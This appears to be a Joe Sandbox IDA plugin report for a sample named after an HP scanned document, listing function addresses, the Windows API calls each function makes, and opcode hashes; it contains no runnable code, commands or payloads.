Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 908df50457970ae771974849dae04a3d1b467e7238ba4de22139128350ee8ac1
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 8481C771A00B0A9BD720AE6DCC41B6B73E9FF91324F244539F651D7282EB70D9008F91

Function 008461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008382D9,008382D9,?,?,?,0084644F,00000001,00000001,8BE85006), ref: 00846258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0084644F,00000001,00000001,8BE85006,?,?,?), ref: 008462DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008463D8
__freea.LIBCMT ref: 008463E5

Part of subcall function 00843820: RtlAllocateHeap.NTDLL(00000000,?,008E1444,?,0082FDF5,?,?,0081A976,00000010,008E1440,008113FC,?,008113C6,?,00811129), ref: 00843852

__freea.LIBCMT ref: 008463EE
__freea.LIBCMT ref: 00846413

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 890c7553ec466c3754c397b2123071da2fd3365960fa4f25ca406f767ef50a4a
Instruction ID: fabab229cc223bcd0b8a1159b4dbe838b1c9c8d6b71b1c5b5638f133313e49f0
Opcode Fuzzy Hash: 890c7553ec466c3754c397b2123071da2fd3365960fa4f25ca406f767ef50a4a
Instruction Fuzzy Hash: BB51F572A0025EABEF258F64CC81EAF77A9FF46710F154229FC05D6240EB34DC60C662

Function 0089BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 0089C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0089B6AE,?,?), ref: 0089C9B5
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089C9F1
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089CA68
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0089BD25
RegCloseKey.ADVAPI32(00000000), ref: 0089BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0089BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0089BDF3
RegCloseKey.ADVAPI32(?), ref: 0089BDFF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 9a84ffcd267393315e3c1a86d69cdbc60fc681dc514651efc478dfc1ba977dc2
Instruction ID: 9c124fa964434d0f9a6328c093096905e6e895f4974f32505acc0263516bcbe3
Opcode Fuzzy Hash: 9a84ffcd267393315e3c1a86d69cdbc60fc681dc514651efc478dfc1ba977dc2
Instruction Fuzzy Hash: A281D430108241EFD714EF24D981E6ABBE9FF84308F18445CF5598B2A2DB31ED45CB92

Function 0086F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0086F7B9
SysAllocString.OLEAUT32(00000001), ref: 0086F860
VariantCopy.OLEAUT32(0086FA64,00000000), ref: 0086F889
VariantClear.OLEAUT32(0086FA64), ref: 0086F8AD
VariantCopy.OLEAUT32(0086FA64,00000000), ref: 0086F8B1
VariantClear.OLEAUT32(?), ref: 0086F8BB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0bc9ae4d46329d172454d139c963c64200631012274b4a782696fb6f26f69dd3
Instruction ID: 0ce2c24d0044c96843db78e00cd9a449fc8b149da65f9bd335bf0d8337d5c40e
Opcode Fuzzy Hash: 0bc9ae4d46329d172454d139c963c64200631012274b4a782696fb6f26f69dd3
Instruction Fuzzy Hash: F151D531600314BADF10AB69E895B69B7A8FF45314F215476EA05DF293DB70CC40C757

Function 0088910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00817620: _wcslen.LIBCMT ref: 00817625

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 008894E5
_wcslen.LIBCMT ref: 00889506
_wcslen.LIBCMT ref: 0088952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00889585

Strings

X, xrefs: 00889412

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 3e463e1266dfbdb672b420d961907dddbb664ff0dd88646c3ada724d97b28877
Instruction ID: 4986c21e5784752fc18fdb8511fb96dbd5dd982fc3364144687bd7a91d50aa11
Opcode Fuzzy Hash: 3e463e1266dfbdb672b420d961907dddbb664ff0dd88646c3ada724d97b28877
Instruction Fuzzy Hash: E1E170315043009FD724EF28D881AAAB7E5FF85314F08856DE999DB3A2DB31ED45CB92

Function 0082920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

BeginPaint.USER32(?,?,?), ref: 00829241
GetWindowRect.USER32(?,?), ref: 008292A5
ScreenToClient.USER32(?,?), ref: 008292C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008292D3
EndPaint.USER32(?,?,?,?,?), ref: 00829321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008671EA

Part of subcall function 00829339: BeginPath.GDI32(00000000), ref: 00829357

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 8b941adba3d4da861d5ff253420de8927611d9750ed5cb86be8b4a6835078c28
Instruction ID: 4953935d01614026069910bf2cf886655a2ac5403b61a3b25af6e88502b22371
Opcode Fuzzy Hash: 8b941adba3d4da861d5ff253420de8927611d9750ed5cb86be8b4a6835078c28
Instruction Fuzzy Hash: 48419230104255AFDB11DF24DC88FBA7BF8FB56724F140269F9A4CB2A2C7319885DB62

Function 008807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0088080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00880847
EnterCriticalSection.KERNEL32(?), ref: 00880863
LeaveCriticalSection.KERNEL32(?), ref: 008808DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008808F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00880921

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: c903b28666f01232c04a3fc49c4634c793a8cc115c5383ef2d03809a0b8796bd
Instruction ID: 97c1c09b8b0bb1b37da1e2528bcb4fd6910d61e205d9ce07195dcc1bd9c1ebe0
Opcode Fuzzy Hash: c903b28666f01232c04a3fc49c4634c793a8cc115c5383ef2d03809a0b8796bd
Instruction Fuzzy Hash: 07415871A00205EBEF15AF58DC85AAA77B8FF04310F1440B9E900EA297DB30DE64DFA1

Function 008A81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0086F3AB,00000000,?,?,00000000,?,0086682C,00000004,00000000,00000000), ref: 008A824C
EnableWindow.USER32(00000000,00000000), ref: 008A8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 008A82D1
ShowWindow.USER32(00000000,00000004), ref: 008A82E5
EnableWindow.USER32(00000000,00000001), ref: 008A830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008A832F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 8cf9a876dc7c5bb911b91e42a30a2989fec43bed5230ad46e8978703e54ff130
Instruction ID: 54bf42c32fabe735bb12fa964f3e29d472ad1df16a1202422e8cbcc8552709fe
Opcode Fuzzy Hash: 8cf9a876dc7c5bb911b91e42a30a2989fec43bed5230ad46e8978703e54ff130
Instruction Fuzzy Hash: 92418234601644EFEF25CF25D8D9BE47BE1FB0B714F1841A9E6488F6A2CB31A851CB60

Function 00874C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00874C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00874CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00874CEA
_wcslen.LIBCMT ref: 00874D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00874D10
_wcsstr.LIBVCRUNTIME ref: 00874D1A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 2888a8d28d5c1b79666de1ceb03fa80c5d3a67425323edd7ff3654ef87e9b918
Instruction ID: 03cb17eb58e13c9116c321fb2313c496dc40858aa84b12aa3cf2721857143011
Opcode Fuzzy Hash: 2888a8d28d5c1b79666de1ceb03fa80c5d3a67425323edd7ff3654ef87e9b918
Instruction Fuzzy Hash: 13210731204214BBFB669B39AC49E7B7FACFF46750F10903DF809CA196EB65DC4092A1

Function 0088581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00813AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00813A97,?,?,00812E7F,?,?,?,00000000), ref: 00813AC2

_wcslen.LIBCMT ref: 0088587B
CoInitialize.OLE32(00000000), ref: 00885995
CoCreateInstance.OLE32(008AFCF8,00000000,00000001,008AFB68,?), ref: 008859AE
CoUninitialize.OLE32 ref: 008859CC

Strings

.lnk, xrefs: 00885876, 008858C1, 00885985

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 29e61a2b3fbceeb74b458838c11da5bdaf0efac1433405f725ca0f8e2f58bb4e
Instruction ID: dc0a413d1caf724311832d4f66e59fd7a8b9ff61121baa062f935c6cdf3b351d
Opcode Fuzzy Hash: 29e61a2b3fbceeb74b458838c11da5bdaf0efac1433405f725ca0f8e2f58bb4e
Instruction Fuzzy Hash: A4D143716086019FC714EF28C480A6ABBE6FF89724F14885DF889DB361DB31ED45CB92

Function 0087175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00870FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00870FCA
Part of subcall function 00870FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00870FD6
Part of subcall function 00870FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00870FE5
Part of subcall function 00870FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00870FEC
Part of subcall function 00870FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00871002

GetLengthSid.ADVAPI32(?,00000000,00871335), ref: 008717AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 008717BA
HeapAlloc.KERNEL32(00000000), ref: 008717C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 008717DA
GetProcessHeap.KERNEL32(00000000,00000000,00871335), ref: 008717EE
HeapFree.KERNEL32(00000000), ref: 008717F5

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 71c549b2d0fc57d8c3dea8781ffb7a4afb97f7d97a3489986b0a796f3d623837
Instruction ID: c287dc3669ad41d6d8603cdef7af3be79336bb2fb987844643bd9ce41e70d399
Opcode Fuzzy Hash: 71c549b2d0fc57d8c3dea8781ffb7a4afb97f7d97a3489986b0a796f3d623837
Instruction Fuzzy Hash: D3118E71610605FFEF189FA8CC49BAE7BA9FB46399F108018F445D7628D735E944CB60

Function 008714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008714FF
OpenProcessToken.ADVAPI32(00000000), ref: 00871506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00871515
CloseHandle.KERNEL32(00000004), ref: 00871520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0087154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00871563

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 55d4f103e32fe1d50eb19279ab4f58b3bc79fab52348ad51fa6d594dc2f698b5
Instruction ID: 1cb463768898732bdc4af13678b8ca6cd40078eeab98da4c54d6185bd3a41d23
Opcode Fuzzy Hash: 55d4f103e32fe1d50eb19279ab4f58b3bc79fab52348ad51fa6d594dc2f698b5
Instruction Fuzzy Hash: 4B11267250020DABEF118FA8DD49BDE7BAAFF49748F048025FA09A2560C375CE64DB60

Function 00833382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00833379,00832FE5), ref: 00833390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0083339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008333B7
SetLastError.KERNEL32(00000000,?,00833379,00832FE5), ref: 00833409

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8093718281f4a5dc69b8a4b0ac8527cfb4b41150507487204df641e7972dabc4
Instruction ID: c73dfd7fad4422cf9083f8d83e5c15a589bcff93cf0a8af1320c2af897f5c5ed
Opcode Fuzzy Hash: 8093718281f4a5dc69b8a4b0ac8527cfb4b41150507487204df641e7972dabc4
Instruction Fuzzy Hash: E901D43364E712BEAA2527797C86A676F94FBA5379F20832AF410C53F0EF114D01A5C5

Function 00842D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00845686,00853CD6,?,00000000,?,00845B6A,?,?,?,?,?,0083E6D1,?,008D8A48), ref: 00842D78
_free.LIBCMT ref: 00842DAB
_free.LIBCMT ref: 00842DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0083E6D1,?,008D8A48,00000010,00814F4A,?,?,00000000,00853CD6), ref: 00842DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0083E6D1,?,008D8A48,00000010,00814F4A,?,?,00000000,00853CD6), ref: 00842DEC
_abort.LIBCMT ref: 00842DF2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: f852c100371b8bcd9737db8233ef09cec7ca2e8db67c725e29f274cfdecbad28
Instruction ID: 989a69dba07be89eafd82ea3462224152ec7ba480fc23ccbc736140142a10aa8
Opcode Fuzzy Hash: f852c100371b8bcd9737db8233ef09cec7ca2e8db67c725e29f274cfdecbad28
Instruction Fuzzy Hash: F7F0C83190DA1D67D612773DBC0AF1E3A59FFC27A5F640519F824D22D2EF7488014162

Function 008A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00829639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00829693
Part of subcall function 00829639: SelectObject.GDI32(?,00000000), ref: 008296A2
Part of subcall function 00829639: BeginPath.GDI32(?), ref: 008296B9
Part of subcall function 00829639: SelectObject.GDI32(?,00000000), ref: 008296E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 008A8A4E
LineTo.GDI32(?,00000003,00000000), ref: 008A8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 008A8A70
LineTo.GDI32(?,00000000,00000003), ref: 008A8A80
EndPath.GDI32(?), ref: 008A8A90
StrokePath.GDI32(?), ref: 008A8AA0

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a4262048931d3c8a7ad926f1740df1e1acc08e8f8b500f545a99e1268d739167
Instruction ID: aa9fc65547969822506b436fc71b37a789f94fe6ab7fe01a9b68fc4c60a886bc
Opcode Fuzzy Hash: a4262048931d3c8a7ad926f1740df1e1acc08e8f8b500f545a99e1268d739167
Instruction Fuzzy Hash: 14110976000158FFEF129F94DC88EAA7F6CFB09350F008012FA199A5A1D771AD55DBA0

Function 008751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00875218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00875229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00875230
ReleaseDC.USER32(00000000,00000000), ref: 00875238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0087524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00875261

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: fbc241248d2aaa85f51b2a6497c70e47d628fa17918573f3394e813a365c5340
